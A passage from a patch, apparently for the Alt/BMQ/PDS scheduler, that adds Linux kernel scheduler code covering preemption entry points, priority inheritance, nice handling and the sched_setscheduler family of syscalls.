++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disable() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note, that this is called and return with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is loads of tricky to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a nono in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task is
++	 * not SCHED_NORMAL/SCHED_BATCH:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy         return value   kernel prio    user prio/nice
++ *
++ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
++ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * allow normal nice value to be set, but will not have any
++	 * effect on scheduling until the task not SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squash it as prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * IF use task_access_lock() here:
++	 * For the task p which is not running, reading rq->stop is
++	 * racy but acceptable as ->stop doesn't change much.
++	 * An enhancemnet can be made to read rq->stop saftly.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads its a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboost
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ *
++ * Return: 0 on success. An error code otherwise.
++ * @param: structure containing the new RT priority.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
